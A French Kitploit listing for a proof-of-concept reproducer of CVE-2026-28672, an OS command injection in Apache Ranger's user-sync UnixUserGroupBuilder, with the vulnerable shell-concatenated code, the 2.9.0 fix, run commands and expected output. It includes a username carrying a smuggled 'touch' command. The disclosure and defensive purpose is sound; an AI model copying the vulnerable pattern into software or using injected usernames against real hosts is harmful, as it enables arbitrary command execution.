Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-28672 — Reproducteur de preuve de concept pour l'injection de commandes OS dans UnixUserGroupBuilder d'Apache Ranger (CVE-2026-28672), démontrant la vulnérabilité et vérifiant le correctif. | Kitploit
Outils/GitHubGitHub/oscerd/cve-2026-28672
Analyse des VulnérabilitésExploitationExploitation d'Applications WebArticles et RechercheApprentissage et Éducation
GitHuboscerd/cve-2026-28672

CVE-2026-28672

Reproducteur de preuve de concept pour l'injection de commandes OS dans UnixUserGroupBuilder d'Apache Ranger (CVE-2026-28672), démontrant la vulnérabilité et vérifiant le correctif.

Voir le dépôt
il y a 8h 36mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-28672 — Injection de commande système dans Apache Ranger UnixUserGroupBuilder

Reproducteur exécutable de preuve de concept pour l'injection de commande système dans le module user-sync (unixusersync) d'Apache Ranger.

Lors de l'énumération des groupes de chaque utilisateur synchronisé, UnixUserGroupBuilder exécute la commande id via un shell, en concaténant le nom d'utilisateur dans la ligne de commande :

root@kitploit:~
// ugsync/src/main/java/org/apache/ranger/unixusersync/process/UnixUserGroupBuilder.java  (Ranger <= 2.8.0)
Process process = Runtime.getRuntime().exec(new String[]{"bash", "-c", "id -G " + userName});

Le nom d'utilisateur provient de la source user-sync configurée (LDAP/AD ou un fichier), il est donc influençable par un attaquant. Un nom d'utilisateur contenant des métacaractères de shell — par ex. alice; touch /tmp/pwned — est exécuté comme une commande système (CWE-77, neutralisation incorrecte des éléments spéciaux utilisés dans une commande).

Exécution

root@kitploit:~
mvn -q -DskipTests package
docker compose up --build
# or, without Docker (needs bash/id/touch on PATH):
java -jar target/cve-2026-28672.jar
Télécharger l’outil

Sortie attendue sur le chemin de code vulnérable :

root@kitploit:~
[1] Benign username 'nobody':
      id -G nobody -> 65534
[2] Malicious username 'nobody; touch /tmp/pwned-28672' (vulnerable <= 2.8.0):
      injected command executed? marker /tmp/pwned-28672 exists = true
[3] Same malicious username through the 2.9.0 FIX (id run directly, no shell):
      id -G 'nobody; touch /tmp/pwned-28672' -> null
      injected command executed? marker exists = false
>>> PROVEN: ... OS command injection (CWE-77): true

Résumé de la vulnérabilité

PropriétéValeur
ProjetApache Ranger — org.apache.ranger.unixusersync (user-sync)
ClasseCWE-77 Neutralisation incorrecte des éléments spéciaux utilisés dans une commande ('injection de commande')
Vecteur d'attaqueUn nom d'utilisateur contenant des métacaractères de shell fourni par la source user-sync
ImpactExécution arbitraire de commandes système sur l'hôte user-sync de Ranger
Versions affectéesde 0.6 à 2.8
Version corrigée2.9.0
Avisfil de discussion lists.apache.org · CVE-2026-28672
CréditAndrea Cosentino

Le correctif

Apache Ranger 2.9.0 exécute id directement sous forme de vecteur d'arguments, de sorte que le nom d'utilisateur est un seul argument littéral et n'est jamais interprété par un shell :

root@kitploit:~
// Ranger 2.9.0
Process process = Runtime.getRuntime().exec(new String[] {"id", "-G", userName});

UnixUserGroupBuilderVuln.java dans ce dépôt contient les deux formes textuellement, citées d'après la source en amont.

Avertissement

Ce dépôt est publié à des fins éducatives et défensives : aider les utilisateurs d'Apache Ranger à comprendre la vulnérabilité, vérifier s'ils sont affectés et confirmer que la mise à niveau la résout. La charge utile est bénigne (elle crée un fichier marqueur dans /tmp). N'utilisez pas ce contenu contre des systèmes que vous ne possédez pas ou n'exploitez pas.